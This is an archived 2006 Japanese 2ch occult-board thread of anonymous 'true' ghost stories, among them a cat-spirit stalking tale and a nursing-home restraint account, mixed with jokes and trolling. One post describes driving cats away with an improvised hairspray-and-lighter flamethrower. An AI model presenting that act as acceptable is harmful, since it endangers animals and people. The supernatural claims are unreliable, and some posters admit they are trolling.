361 :本当にあった怖い名無し:2006/10/09(月) 03:48:55 ID:uMqR1q2UO
今体験した不思議なこと。多少不快にさせるかもしれんけど
実際はそんなことないから。

今,変な夢でも見たわけじゃないのにいきなり目が覚めた。なんかパンツのケツのあたりが冷たい。
湿ってる感じだ。恥ずかしい話「あ,漏らしたのかよ」と思った。今までこんなことなかったけど
体調が悪いのに下剤飲んだのが悪かったかなーと,冷静にトイレに行った。
パンツを下ろしおそるおそるそのケツの辺りを見ると,なんもついてない。
あ?気のせいか?触ってみた。湿っている。ニオイを嗅いでみた。無臭だ。
なんだろう?と思いながらベッドに帰ってきた

362 :本当にあった怖い名無し:2006/10/09(月) 03:58:06 ID:uMqR1q2UO
まー気のせいだろうと,眠りにつこうと掛け布団を顔あたりまでもってくる。
異様に湿っている!「は!?」
やっぱ漏らしたのか!?携帯の光で照らして見てみる。無色。ニオイは?…無臭。
なんなんだこれは?とりあえずフトンをひっくり返して横になろうとしてみる。すると今度は枕がビショビショに濡れてた!
ヨダレをたらしたのか?顔を触って確認するけどそんな形跡はない。
汗でもない。


363 :本当にあった怖い名無し:2006/10/09(月) 04:02:08 ID:ZXxAcy+TO
早く投下しなくちゃいけない!

ごめんなさい気になるんです><

364 :本当にあった怖い名無し:2006/10/09(月) 04:05:07 ID:uMqR1q2UO
まったく意味がわからない。ちょっと怖くなったのでなんか書き込んでみた。
これってなにか霊的なものなんですか?なにか報せてるとかか?
あと今ベランダに知らない男が二人くらいいて,たまになんかの確認なのか話し声が漏れてくんだけど
その声は普通に不愉快。もちろん部屋のカーテンは閉めてますけどね。
早くかえんねえかなー

365 :本当にあった怖い名無し:2006/10/09(月) 04:10:14 ID:7cvgyWSnO
ベランダの奴等に犯された…って話か?

366 :本当にあった怖い名無し:2006/10/09(月) 04:12:49 ID:0WNHolClO
大丈夫かよ。
警察呼べよ

367 :本当にあった怖い名無し:2006/10/09(月) 04:17:44 ID:LBV110j40
>>364
>あと今ベランダに知らない男が二人くらいいて,たまになんかの確認なのか話し声が漏れてくんだけど
>その声は普通に不愉快。

釣り乙。
釣りでないなら精神を病んでるので病院へ行くように。

368 :本当にあった怖い名無し:2006/10/09(月) 04:19:32 ID:ZXxAcy+TO
ID:uMqR1q2UOのバカ、一気にシラけた><
もっとうまい嘘ついてよ><

369 :本当にあった怖い名無し:2006/10/09(月) 04:23:04 ID:0WNHolClO
いや、もしネタじゃないとしたらどーするよ?
このご時世だし、変質者だって・・・・

370 :本当にあった怖い名無し:2006/10/09(月) 06:19:25 ID:DrRCLf9a0
20年ぐらい前、父方の祖母が亡くなったときの話。
父の田舎では葬式前に近所の人達が総出で墓穴を掘るのが習慣だった。
掘った後、雨が降って穴に水が溜まったのだが、そのとき「掘った墓穴に水が溜まると次が早い(すぐに近所から亡くなる人が出るという意味)」という言い伝えがあると誰かが言ったらしい。
そのときは集落にこれといって高齢の人や重い病気の人はおらず、まさかそんなことないだろうと言い合っていたそう。
ところが祖母の葬式の翌日か翌々日、近所の男子中学生が自殺してしまった。
祖母は90歳近くまで大きな病気もせず生きのび徐々に衰弱、就寝中に何かで窒息っていう老衰に近い死に方。
自分には霊感は全くない。ずっと病院で働いてるが、同僚が「いる」とか言ってても全然何も感じない方。
それだけに自分の身内が関ってそうなこの出来事をなんとなく申し訳なく思ってしまう。



371 :本当にあった怖い名無し:2006/10/09(月) 08:21:21 ID:ucqqErjsO
だまれうぐいす平安京

372 :本当にあった怖い名無し:2006/10/09(月) 10:03:51 ID:j9Ab/YnSO
>>371
お前が黙れ!

373 :本当にあった怖い名無し:2006/10/09(月) 10:36:54 ID:FJmuRiUn0
怖い話します

3連休なのに予定が無い

374 :本当にあった怖い名無し:2006/10/09(月) 10:54:59 ID:pa3TO2P90
>>373
散歩でもしてこい!

375 :本当にあった怖い名無し:2006/10/09(月) 11:37:41 ID:HElD3FpD0
>>370
そりゃ、
「雨が降るような天候の中、総出で穴を掘った」んだろ?
現代ならまだしも、昔なら亡くなるきっかけにはなりうるだろうから、
そういう言い伝えが出来ても不思議じゃない。
ただでさえ葬式ってのは精神的にも肉体的にも疲れるんだから。

376 :本当にあった怖い名無し:2006/10/09(月) 14:33:02 ID:dkSoH0Z+0
まとめサイトの掲示板ってなくなったの?

377 :ルー大柴:2006/10/09(月) 15:00:24 ID:j9Ab/YnSO
トゥギャザーしようぜ

378 :本当にあった怖い名無し:2006/10/09(月) 16:25:55 ID:cUnMVuIq0
>>370
お前さん、「夜に口笛吹くと天狗が来る」とか、まともに信じちゃいませんか?
アンタの言う言い伝えは、「水が溜まるような状況で墓穴を掘るな」という戒めのような気がするんですが。

379 :本当にあった怖い名無し:2006/10/09(月) 16:56:33 ID:oWPXlJxO0
今年の6月ころの話なんだけどさ、
夜中に目覚めたのよ。でもこれはよくあるじゃん。
ただその日違ったのは、目が覚めて部屋見回したらさ、
壁に垂直に、白いヘルメットがスーっと落ちてくわけ。
バイク用ので、目覆う黒いとこが下りてて着用中みたいな。
俺の部屋の壁って木目がある茶壁なのよ。
だからもうはっきり白地に赤く文字が入ってる感じまで見えた。
ずっと霊見たってまわりに話しまくってたんだけど、
今日HELLもあるなと気づいたら、そうきたかって思った。


380 :本当にあった怖い名無し:2006/10/09(月) 18:29:31 ID:j9Ab/YnSO
ここで面白い話していい?

381 :本当にあった怖い名無し:2006/10/09(月) 18:41:10 ID:LLegrw0s0
>>376
馬鹿共が暴れまくったからな。

382 :本当にあった怖い名無し:2006/10/09(月) 18:42:41 ID:6WYI+wla0
>>380
ここでは怖い話しかしてはいけません! p><;q

383 :本当にあった怖い名無し:2006/10/09(月) 18:52:12 ID:j9Ab/YnSO
>>382
(・ω・`)帰ろ…

384 :本当にあった怖い名無し:2006/10/09(月) 19:52:35 ID:6WYI+wla0
「おい!起きろ!」
俺は必死に彼女を起こした…
彼女は死んでいたのだ…
それいらい夕日を見るのが怖くて仕方ありません。

385 :本当にあった怖い名無し:2006/10/09(月) 20:00:04 ID:j9Ab/YnSO
なむなまなかぬ

386 :本当にあった怖い名無し:2006/10/09(月) 20:01:18 ID:j9Ab/YnSO
>>385
田村正和でしょ?

387 :本当にあった怖い名無し:2006/10/09(月) 20:17:21 ID:j9Ab/YnSO
戦っちった(><)

388 :本当にあった怖い名無し:2006/10/09(月) 20:44:01 ID:j9Ab/YnSO
>>381
お前が馬鹿だろwwwww

389 :気を付けて:2006/10/09(月) 20:55:48 ID:ucqqErjsO
>>388 分かりました。

390 :本当にあった怖い名無し:2006/10/09(月) 20:57:10 ID:j9Ab/YnSO
すいませんでした。もう来ません。

391 :本当にあった怖い名無し:2006/10/09(月) 22:05:58 ID:MCHJRMo+0
「毎日屁をこくと天狗になる」
って聞いたことねぇな

392 :本当にあった怖い名無し:2006/10/09(月) 22:25:38 ID:xnrwoR6i0
>>379
読め

393 :本当にあった怖い名無し:2006/10/09(月) 23:08:56 ID:j9Ab/YnSO
>>392
読んだけど意味わからないよ

394 :本当にあった怖い名無し:2006/10/09(月) 23:39:09 ID:JloIJp1+0
HELLメット


みたいな。

395 :本当にあった怖い名無し:2006/10/10(火) 00:31:41 ID:IQcloLJj0
みんな寝ちゃったの〜?

396 :本当にあった怖い名無し:2006/10/10(火) 00:42:55 ID:j8SC3fiA0
なんかしばらく来ない間にすごく低脳なスレになってしまったな・・・

397 :本当にあった怖い名無し:2006/10/10(火) 00:44:58 ID:JfcgKtK7O
>>396
お前アイカゴか?

398 :本当にあった怖い名無し:2006/10/10(火) 00:49:47 ID:3XulnMMQO
家で子供が「いるんだよいるんだよ」と叫びながら泣くので母親が、どこに何がいるの、と聞くと「台所の冷蔵庫のあたりにおじさんが顔を下に向け体操座りしている」と言います。
母親が台所へ確かめにいきますが誰もいないのです。

399 :本当にあった怖い名無し:2006/10/10(火) 00:52:29 ID:3XulnMMQO
母親が父親に事を伝えると「じゃあ今からパパがそのおじさんを退治してやろうね」と言いモップを持って台所へ向かい冷蔵庫の近くで、えいっやあっなどと言いながらモップを数回振りました。その様子を見ていた子供は少し安心した表情になりました。
父親がにこにこしながら母親の方へ近づき、母親の耳元で「いるじゃないか」

400 :矢口:2006/10/10(火) 00:56:14 ID:JfcgKtK7O
キャハハハハハッハッハッハァー

401 :本当にあった怖い名無し:2006/10/10(火) 00:59:22 ID:ZMDhhn/bO
家に帰ると庭に大きな穴があった。深さ5メートル位ある。誰がこんなもの掘ったのか。不気味だ。以下略

402 :本当にあった怖い名無し:2006/10/10(火) 01:05:37 ID:JfcgKtK7O
俺にちょくちょく生き霊が乗り移ってこまるおっお

403 :星泉:2006/10/10(火) 01:07:28 ID:JfcgKtK7O
か・い・か・ん

404 :本当にあった怖い名無し:2006/10/10(火) 10:08:43 ID:j8SC3fiA0
低脳が集まるスレへようこそ

405 :本当にあった怖い名無し:2006/10/10(火) 10:09:58 ID:dQlZSdJ60
地元のカラオケのある部屋に幽霊が出るという噂があるんだが、
友人がバイト先の先輩達とその部屋に行ったらしい。

その日は結構人がいたらしく、その部屋しか空いてなかったそうだ。
店員も「○号室しか空いてないのですが…よろしいでしょうか?」
みたいな感じで、かなり言いづらそうにしていたらしい。
そこで悪乗りした友人達はその部屋でカラオケをすることにした。
2時間程カラオケを楽しんで「何も起こらなかったな」とか言いながら各々
家に帰った。
んで、その友人が風呂に入ろうと服を脱ぐと、体中にアザが出来ていたらしいです。

その部屋の噂は、イスの下からドンドンと叩かれて、その振動を感じた人の体だけに
アザが出来るというものなのですが、その友人は振動なんて感じなかったそうです。
俺が体験したわけでは無いのでそれ程怖くは無いのですが、その友人はしばらく怯えきっていて
いまだにその先輩たちにはアザのことを言っていないらしいです。

406 :本当にあった怖い名無し:2006/10/10(火) 11:27:40 ID:JfcgKtK7O
なんで藤森くん俺の大事にしてた復刻版のヘッドロココはったん?絶交や!

407 :本当にあった怖い名無し:2006/10/10(火) 14:40:27 ID:JfcgKtK7O


408 :本当にあった怖い名無し:2006/10/10(火) 16:53:16 ID:j8SC3fiA0
>>406
あ、ごめんヘッドロココはってしもた
ゆるしてーな

409 :本当にあった怖い名無し:2006/10/10(火) 18:49:32 ID:OyylTOCw0
2年ぐらい前にココであがってた話の詳細おぼえてる人いない??

富山のビジネスホテルで水出してないのに浴室から水の音が聞こえて
くるってやつ・・・

ヤバイんすけど、コレ


410 :本当にあった怖い名無し:2006/10/10(火) 19:27:55 ID:JfcgKtK7O
>>409
やばいよね…

411 :本当にあった怖い名無し:2006/10/10(火) 19:49:20 ID:8yrsgYKo0
>>409
これ?
http://syarecowa.moo.jp/99/45.html

412 :本当にあった怖い名無し:2006/10/10(火) 22:38:11 ID:s2UqApp70
昨日起きた事です
あまり怖くないかもしれませんが
書かせていただきます(って、それじゃスレの趣旨と違うか・・・)
では行きます








取得単位数10だった・・・・

413 :本当にあった怖い名無し:2006/10/10(火) 22:44:45 ID:JfcgKtK7O
>>412
だーい好き!

414 :本当にあった怖い名無し:2006/10/10(火) 22:49:41 ID:p1tb0/4o0
現在進行中の体験談


カフェで働いてるんだけど、目の前に大きなマンションが2つあるのね。結構新しいやつ
暇なのと、構造上カウンター付近で仕事してる事が多いんだけど、暇だから目線が漂う。
で、ちょうど目の前に広がるマンション2つ(ガラス張りになっていて外を眺められる)を
見ることが多い。

そのマンション2つ、1つ向かって左側のはリビング側の部屋が並んでる。
もう1つ向かって右側のマンションは非常階段みたいなのが見える。

夕方頃まで(暗くなるまで)は左側のマンションの一番上の一番右の部屋。
そこから女の人がずっとこっち見てる。自分結構目がいいのと、マンションがそれほど離れていない
せいか、かなりはっきりと見える。私が気付くといる。幽霊かはわからん。

もう一つ、右側の非常階段は暗くなると、こっちに向かって手を振る女の人がいる。こう、
階段の踊り場ごとから。その速さが半端ない。10階からいきなり4階、とか、5階から7階へとか。
もう、早送りしてるみたいな素早さで動いてる。気を抜いたら目の前にいるんじゃないかって
くらい早い。

普通にやばい

415 :本当にあった怖い名無し:2006/10/10(火) 23:11:19 ID:zcs6gx7Q0
>>412
普通の取得単位って1年で44〜46くらいだっけ?

講義に出てレポートあげろ・・・

416 :本当にあった怖い名無し:2006/10/10(火) 23:12:40 ID:j8SC3fiA0
>>413
じゃかわしぃわぃ!!

417 :本当にあった怖い名無し:2006/10/10(火) 23:23:10 ID:WjCQHa4K0
昨日の夜から変なことが起きてる...。何かネコマタっぽいんだが、どうしたもんだか。
対ネコマタ用のお祓いとか、貢ぎ物とか知ってる香具師いたら教えてくれ。

418 :本当にあった怖い名無し:2006/10/10(火) 23:31:45 ID:n72KYaid0
先週の深夜コンビニに買い物しにいく前に近くの林道にサイクリングしに行ったんだ。
別に何も出ないだろうけど、暇だしちょっとスリルを味わいに行こうとさ・・・。
その林道は民家等無くて有るのはタバコやドリンクの自販機しか無く明かりもそこだけで
夜行くと結構怖い。
んで、そろそろ戻ろうと着た道引き帰してさっきの自販機でコーヒー買ってコンビニ向かう事
にしたんだけど、自販機からちょっと行った所に何か黒い影が見えたんだが、
近づくにつれてソレが人だと分かった。
その女性の横を通過した時、すごい良い匂いがしたんだ。香水のさ。
深夜の2時回ってたのに女一人であんな暗くて不気味な所に居るのなんて明らかにおかしい
幽霊じゃなくてリアルで変な人間と思ったんでスルーしてコンビニに行った。
家に帰ってからさっきの女が気になって気になって仕方なかった
歳は多分20代だと思うんだが、何よりあの香水の匂いが良い匂いでたまらなかった。
次の日の朝、仕事行く前に遠回りになるがもう1度その林道をバイクで通ったんだ
なんとビックリ!あの女が立ってた場所にウンコが落ちてたんだ。
俺は「エェ〜」って感じでその糞をカバンに詰めてその場を後にした

                                    〜fin〜

419 :本当にあった怖い名無し:2006/10/10(火) 23:35:51 ID:9GSc2x5K0
>>417
変なことってどんな事?
昔飼ってたぬこが来たとかじゃなくて?


420 :本当にあった怖い名無し:2006/10/10(火) 23:40:41 ID:lAYlwfJm0
>>419
何か俺の住んでるマンションの前のゴミ捨て場にネコがよく集りにくるんだよ
追い払おうとしても全然ビビらなくてじっとしてる

421 :417:2006/10/10(火) 23:45:09 ID:WjCQHa4K0
やっぱ事の次第を詳しく書いとこう。事の発端っぽいのは昨日の夜の一件。
...だと思う。というか他に思い当たるフシがない。

昨日、サークルの飲み会があって、程よく酔っぱらって気持ち良く帰ってる途中に変な体験をした。

最近、駅と俺が住んでるアパートの途中にある某雑居ビルの周辺で猫を良く見るようになったのね。
1週間ぐらい前までは、猫とか見なかったのに突然湧いて出てきたって感じ。
その雑居ビルは階段が外にあって、地下室への入り口も外にあるの。普段は特に気にしなかったんだけどね。

で、昨日の夜、酔っぱらって帰宅途中にそのビルの前を通った時、何か声がその雑居ビルの地下室への入り口の辺で聞こえたのね。

何言ってたのか聞こえなかったのだけど、「巡回」とか「援軍」って単語が聞こえて何か気になったのね。
で、酒が入っていて感覚が鈍っていたせいか、何の躊躇もなくその声が聞こえる雑居ビルの地下室の方に行ってみたんだ。

地下室の入り口に立つと声が割とはっきり聞こえてきた。
何か会議というか相談をしているみたいで、地下室の方は電気もついてなかったから誰が何やってるんだろうって思ってた。

珍走とかDQNだったら嫌だなって思ったんだけど、住宅地のど真ん中だから滅多な事は起きないだろうって思って、
足音を殺して、地下室へ降りてみたんだ。

422 :417:2006/10/10(火) 23:53:16 ID:WjCQHa4K0
そしたら、地下室のつきあたりのドアの前で猫が円陣組んでた。数は数えてないけど10匹より少ないってことはなかったと思う。

何か話し合ってる声は聞こえるんだけど猫しかいないから、「あれ?」とか「猫か」みたいな事を言っちゃったんだ。
猫は俺に気付いていないみたいだったんけど、その一言で俺に気が付いたみたいで一斉に「フーーッ!!」って威嚇してきた。

その時は気持ち悪くなったとかじゃなくて、猫の威嚇が妙に恐くてその場から逃げた。

で、昨日の夜、帰ってから北朝鮮の核実験を知ったんで夜のニュースを見てたら、ベランダの窓を誰かが(何か?)がノックするのよ。
最初は風ぐらいに思ってスルーしてたんだけど、延々と続くから気になってカーテンを開けてみた。

423 :本当にあった怖い名無し:2006/10/11(水) 00:01:30 ID:YWECDnGEO
>>416
激しねや!!

424 :本当にあった怖い名無し:2006/10/11(水) 00:07:14 ID:GnJ/+qPu0
でも誰もいない。変わりにベランダに猫がいた。3匹。

猫に威嚇された一件があったから、何か気持ち悪くて、猫を退散させようとしたんだけど、こいつらがどうゆう訳かびくともしない。
触ろうとすると逃げるんだけど、ベランダから出ていこうとしない。

ビールと一緒に買ってきたスルメを猫に見せびらかして興味を引いた後、ベランダから外に投げて、猫がまっしぐらに飛び下りていくのを見届けて部屋に戻ったんだけど、
数分したらまたドアをノックする音が聞こえる。で、カーテンを開けたらまた猫がいる。

昨日の夜は、スルメ作戦を3回ぐらいやっても猫が退散する気配がないから放置した。
何か一晩中ノックするような音は聞こえたけど、酒も入っていたし眠たかったからそのまま寝ちゃった。

で、朝起きたらまだ猫がいる。やっぱり3匹。でも昨夜と猫が違うんだ。
その時は「猫に好かれたなぁ」ぐらいにしか思ってなかった。

今日は朝からバイトがあったんで出かけたのだけど、通勤中もやけに猫を見かけた。
今までは猫とか本当に見なかったから、その時は「猫が増えたなぁ」ぐらいにしか感じなかった。

バイト中、何となく窓の外を見ると猫がいる。
その時になって何だか猫が俺を監視しているような気がして気持ち悪くなった。

ちょっと恐いけど、バイト仲間に「猫が恐いとかダセー」って言われるのもシャクだったので、
「最近、野良猫が増えたな。今日も窓の外にずっといたし」とか言ったんだけど。

「は?猫なんて見てないよ?」って言われた。

425 :本当にあった怖い名無し:2006/10/11(水) 00:10:21 ID:NSTjKWrV0
こわっ!
ttp://001.gamushara.net/mongoose/data/1156683680141.jpg


426 :417:2006/10/11(水) 00:14:15 ID:GnJ/+qPu0
今夜もベランダの窓をノックする音が聞こえたんだよね。
カーテン開けたら、やっぱり猫がいた。

恐い以前に、ストーカーされてるみたいで、ちょっとムカついたんでヘアスプレー+ライターの即席火炎放射器で追い払った。
そしたら、ベランダから猫もいなくなり、延々と窓をノックしていた音も絶えた。

絶えんたんだけど....。

ノックの代わりに時たま窓ガラスをドン!って凄い勢いで叩く音がするようになった。
カーテン開けても猫すらいない。

この騒音攻撃いつまで続くんだろう。
俺、もしかしてネコマタの秘密会議を盗み聞きしたと思われてるのかな?

427 :本当にあった怖い名無し:2006/10/11(水) 00:17:32 ID:AjO34lym0
それは、おまえが悪い!

428 :本当にあった怖い名無し:2006/10/11(水) 00:22:18 ID:AGDV8sn6O
>>426
もう誰にも言わないし邪魔しないからやめろって猫さんに言ってみたら?

429 :本当にあった怖い名無し:2006/10/11(水) 00:22:23 ID:4MpzkNbw0
ぬこをいじめるな!

430 :417:2006/10/11(水) 00:22:38 ID:GnJ/+qPu0
>>427
やっぱ俺が悪いのか。好奇心だして覗くんじゃなかった。

つーか、これどうすりゃいいんだ?
奮発してペティグリチャムとかお供えするべきなのかな?

431 :本当にあった怖い名無し:2006/10/11(水) 00:22:46 ID:5yCYkBVpO
>>417あなたにしか見えないのかな?大丈夫だよ、あなたに何かしようとしてる訳では無いと思うし
優しい気持ちで見守ってあげてほしいです。

432 :本当にあった怖い名無し:2006/10/11(水) 00:22:53 ID:ogYWTTWW0
>>417=>>426
一年間続いたら書き込んでくださいね♪

433 :417:2006/10/11(水) 00:26:46 ID:GnJ/+qPu0
>>428
ベランダに向かって言ってみた。誰も、猫すらいないけど。

>>431
俺にしか見えないのかな?というか俺にすら見えなくなっちゃったんだけど...。
ちなみに窓を叩く音は今も続いている。

>>432
一年も放置し続けるのかYO!!

434 :本当にあった怖い名無し:2006/10/11(水) 00:27:07 ID:AjO34lym0
ためしに、お供えしてみ!ちなみに、スルメは、もうあげるなよ!ぬこはイカ好きだけど、食べるとゲロっから。

435 :本当にあった怖い名無し:2006/10/11(水) 00:29:17 ID:l6JGXrhN0
>>417
落ち着け。ペディグリーチャムは犬の餌だ。

そして、どちらかというと、こっちの管轄。
http://hobby7.2ch.net/test/read.cgi/occult/1159462447/l50

436 :本当にあった怖い名無し:2006/10/11(水) 00:29:49 ID:TRfyWCPQO
さっきまとめ見てきたんだけど車のエンジンルームに猫侵入は結構普通にある話。
年2、3回ある。うちではジャンケンで負けた奴が掃除するけど食欲はなくなるわな。

どんなにスチームで洗っても何してもどうしても匂いが残るから神経質な人は車買い替える人もいるよ。

437 :本当にあった怖い名無し:2006/10/11(水) 00:32:31 ID:S2oVWOun0
長いけど実体験書きます
ぬこ話の流れを断ち切るけどおk?

438 :417:2006/10/11(水) 00:33:27 ID:GnJ/+qPu0
>>434
>>435
助言(?)サンクス。

439 :本当にあった怖い名無し:2006/10/11(水) 00:34:20 ID:p2BZ3Q8v0
>>417
なにか頼みたいことでもあるんじゃないの
もう一度地下室へgo(゚∀゚)

440 :417:2006/10/11(水) 00:34:30 ID:GnJ/+qPu0
>>437
俺は恐い話だと思ったからここに書いたけど、スレ違いだったみたいだから移動するよ。

441 :本当にあった怖い名無し:2006/10/11(水) 00:43:18 ID:S2oVWOun0
>>417おk、元気で

去年の夏、エスカレーターで大学に行きたい俺は内心を上げる為にボランティアへ。
山奥の老人ホームへ行く事になった
老人ホームの集落みたいなところで、自立支援の経費a型から完全介護の特養Lv5まであって、
年長だった俺は運悪く特養Lv5のボランティアを引き当てた。
寝たきりのおばあちゃんがいた俺には介護なんて余裕だなんて思いながら
「特養は入居者の3倍以上が入居待ちで大変だ」てゆー話をソラで聞いてた。


442 :本当にあった怖い名無し:2006/10/11(水) 00:50:11 ID:S2oVWOun0
介護はまあ、オムツ替えたり床に垂れてカピカピの唾液拭いたりタンを吸い取ったり、
歯がないから全部の食事(米もオカズも)をミキサーに掛けたものにクスリを混ぜて口に運んだり
徘徊した老人をつれもどしたりと、普通の人には耐え切れないものも平気でできた。
一生懸命やったし、充実してたし、院長もスタッフも、かろうじて意識のある老人も褒めてくれた


443 :本当にあった怖い名無し:2006/10/11(水) 00:52:39 ID:YWECDnGEO
阿蘇山噴火とかけまして
TRICERATOPSとときます
「そのこころは?」
ボチボチでんな〜(笑)

444 :本当にあった怖い名無し:2006/10/11(水) 00:59:42 ID:vTq11L9EO
昨日、彼氏と地元の有名な心霊トンネル(T県南部の3本あるトンネル)
に行ってきたんだけど、今日の夕方くらいに家で男の人の声を聞いた。
ウチは父以外男は居ないし、仕事から帰ってくるには早過ぎる…
父と同じくらいの歳(50半ば)の男性の声だった。
不思議に思い母に「お父さん帰ってきたの?」と訪ねるが「きてないよ。」
との返答。実際父の車もなく、祖母も「お客さんも来てない」とのこと。
ウチは田舎で傍に他の家もないし、確実に家の中からの声だった。

不思議に思いながらも約束があったので彼氏宅に行くと、その話(家で聞
いた男の人の声)もトンネルに行った話もしてい
ないのに、彼母が「今日の朝方、台所で御飯作ってたらテーブルの所に
中年の男の人が立ってたのよ。スーッと消えちゃ
ったんだけどさぁ…怖かった。」と言ったのでゾーッとした。
その後、帰宅してきた彼兄がお風呂に入り出てくると「なんかドアをバンッ
て叩かれたんだけど。誰?」
皆アリバイあり。彼兄以外誰もその音を聞いていない。
勿論、彼兄はトンネル、私の家の声、彼母が見た男性の話は聞いていない。

連れてきちゃったかも…

445 :本当にあった怖い名無し:2006/10/11(水) 01:02:00 ID:S2oVWOun0
夜になると老人たちが突然いやいやしだして、
何だろうと院長に聞いたら、寝るのがいやなんじゃないのかなという空返事
いざベッドの方まで老人を連れて行くと暴れ出して、
意思表示なんてままならないしそれ以前に言葉すら失っている老人が、
震えて泣きながら「やめてくれ、やめてくれ、やめてくれ」って言い出して
そしたら寒気がした。おじいさんの両腕に赤い締め跡があった。
拘束具て言うと聞こえは悪いけど用途が一緒。
今まで生きてきて戦争を乗り越えたり、日本支えたのに、こんな判らない地域の
こんな緩慢な施設で、ゆっくり身動きとれずに殺されていくんだ、って思ったら
急に俺まで怖くなって、涙が出てきた

446 :本当にあった怖い名無し:2006/10/11(水) 01:06:55 ID:zgwGeNTlO
君も私もいつかはそうなる
今より酷くなってるかもしれん


447 :本当にあった怖い名無し:2006/10/11(水) 01:08:30 ID:S2oVWOun0
「おねがい、おねがい、おねがい、やめ、やめて、」
縛り付けられながら何回も俺を見てくる。
さっきまで開いたか閉じたか判らなかった目を全力で見開いて俺に嘆願してきたから、
激情した俺が拘束を解こうとしたらスタッフの人に止められて、
「なにやってんだ!」って言われて
「るせぇはああなあああせよゴルwせdrtgyふじこlp!!!!!」
て号泣しながら発狂してたらスタッフも院長も泣いてんの。

448 :本当にあった怖い名無し:2006/10/11(水) 01:12:47 ID:60NyTDeCO
>>445高校生が夜までボランティア?
すごいな

449 :本当にあった怖い名無し:2006/10/11(水) 01:18:58 ID:YWECDnGEO
>>448
オメーの方がスゲーぜ

450 :本当にあった怖い名無し:2006/10/11(水) 01:22:33 ID:S2oVWOun0
「(俺)くん…俺もしたくてこんな事をやってるんじゃない!
でもこれは仕事なんだ!どうしようもねぇ!解かるか!」
「んーでだよラァ!」と怒りをブチまけるDQNな俺を院長が一括
「ここの入居者は〜名。だけど入居待ちはその5倍の〜名いるんだよ
入居待ちが何を待っているのか(俺)くん…解かるね」ていいながら泣いてんの。
事前の講習でソラで聞いてた言葉が蘇って、今正に実態を味わって、
ああこんなに恐ろしい意味だったのかコレはと怖くなってまた号泣。もう皆涙。幸せな人が一人もいない。
うめき声が聞こえる寝室の重たいドアを閉めたら、声が聞こえなくなった
もう一生忘れられないトラウマになった

トーチャンカーチャンがボケても俺は絶対自分で看取る。皆もそうして欲しいと本気で思う。

451 :本当にあった怖い名無し:2006/10/11(水) 01:23:34 ID:60NyTDeCO
>>449やっぱり?

452 :本当にあった怖い名無し:2006/10/11(水) 01:25:31 ID:YWECDnGEO
ひかり伝って何弾まで出るの?

453 :本当にあった怖い名無し:2006/10/11(水) 01:29:24 ID:60NyTDeCO
>>452ダムダム弾。

454 :本当にあった怖い名無し:2006/10/11(水) 01:36:32 ID:YWECDnGEO
アダムダム?

455 :本当にあった怖い名無し:2006/10/11(水) 01:56:25 ID:p3pZirIBO
ついさっきの話なんだけど、バイトが終わって帰ってたら家の前にある筆屋の柱の陰に髪長くて赤い服着た子供っぽいのが見えた。
家の裏手にある公園の奥がちょっとした心霊スポットらしくて、そういうのはたまにだけど見たことあるが信じてないから気にしなかったんだけど、
いまシャワー浴びて風呂から出てきて何気なく玄関の鏡見たら、鏡の反射越しにドアのガラスの一枚が真っ赤になってたのを見てしまった
何なのかわからないけどメッチャ怖いorz
軽くパニックで乱文スマソorz

456 :本当にあった怖い名無し:2006/10/11(水) 02:48:01 ID:zM4eIBRL0
>417

まだいらっしゃるかな?
個人的な理由で申し訳ないが、もしよかったらでいいのだけど話に進展があったら
続きを書いてもらえないでしょうか?
俺個人としてはすげー怖い話なので気になってしょうがないです。

457 :本当にあった怖い名無し:2006/10/11(水) 03:14:57 ID:ogYWTTWW0
>>456
彼なら実況スレ行ったよ。
つか昨日の今日で、猫がにゃぁにゃぁ鳴いて猫またです怖いですっつー発想がすげぇオカルトw
笑い話ですよね♪

458 :本当にあった怖い名無し:2006/10/11(水) 03:19:16 ID:U/5vZcBDO
>>456さん
>>417さんはここではなくて、他スレに移動し相談中です。見てみると良いよ。
http://hobby7.2ch.net/test/read.cgi/occult/1159462447/

459 :本当にあった怖い名無し:2006/10/11(水) 03:35:43 ID:GbsTCltrO
さっきトイレに言ったら誰もいないのに
「鳥皮刻んで 味噌(これが肝心)しょうゆ、砂糖、みりん、酒など入れる。
ショウガのみじん切りか、チューブのでも良いのでちょっと入れる。
あれば、ごぼうにんじんきのこ等も入れて炊く。
水加減をうまく調節して少し焦げが出てくれると尚うまい!!!!」という声がした


460 :本当にあった怖い名無し:2006/10/11(水) 03:50:00 ID:/uC38EeKO
>>459
酒の肴レシピか。
池波正太郎っぽい電波だね。


461 :本当にあった怖い名無し:2006/10/11(水) 03:58:02 ID:MjT69F/V0
>>460
ウシロミテミナ

462 :本当にあった怖い名無し:2006/10/11(水) 04:07:42 ID:OKbZEPAx0
つか、このスレの長文書き込みの中断率はオカルト。
書き込み終わるまで待てよwwっていうかリロードしろ。

463 :本当にあった怖い名無し:2006/10/11(水) 04:35:37 ID:/uC38EeKO
>>461
見てみた。
犬がウッウッて小さい声で寝言いってる。


464 :本当にあった怖い名無し:2006/10/11(水) 05:54:55 ID:YWECDnGEO
>>463
俺んちの犬なんか鼾がうるせーうるせー

465 :本当にあった怖い名無し:2006/10/11(水) 05:56:26 ID:0s04ZXlgO
>154
続き見たいんですけど…
後日談、楽しみにしてるんで…
結局なんでSは姿を消したのか?

466 :本当にあった怖い名無し:2006/10/11(水) 08:01:23 ID:zM4eIBRL0
>457
>458

あ、どうもありがとうございます。
覗いてみますね。

467 :本当にあった怖い名無し:2006/10/11(水) 08:10:22 ID:xT01raA30
>>459
「鳥皮刻んで 味噌(これが肝心)

          ↑↑↑
誰もいないのに声が聞こえたということですが、
ここのこの( )の部分はどう聞こえたのでしょうか。
「ミソかっここれが肝心かっこ・・」
とか言っていたのですか?その霊の声は。。。


468 :本当にあった怖い名無し:2006/10/11(水) 09:24:27 ID:MtB2tN6s0
荒らしが釣りで書いてるかもよ。

469 :本当にあった怖い名無し:2006/10/11(水) 11:09:36 ID:xT01raA30

すみません、これも釣りでした。
でもまさか釣れるとは。。。

470 :本当にあった怖い名無し:2006/10/11(水) 11:55:01 ID:ZH9Iqg3L0
409です

出張で富山までいったんだけど泊まったホテルで
おんなじ事おきたんだけど

書いた人もうココこないかな??

あそこマジにヤバイとおもう・・・



471 :本当にあった怖い名無し:2006/10/11(水) 12:07:56 ID:ID6ua9FG0
このようなスレは意図が悪質なため、
【2ch警察】に通報されました。
スレ主および書き込み、閲覧された方は最悪の場合
アクセス禁止の措置に処せられます。
なお、本文を読まれた方は出頭してください。

【2ch警察】
http://society3.2ch.net/test/read.cgi/police/1141057173/

472 :本当にあった怖い名無し:2006/10/11(水) 12:36:42 ID:y7hrG/r90
>>470
ホテルは何て名前?

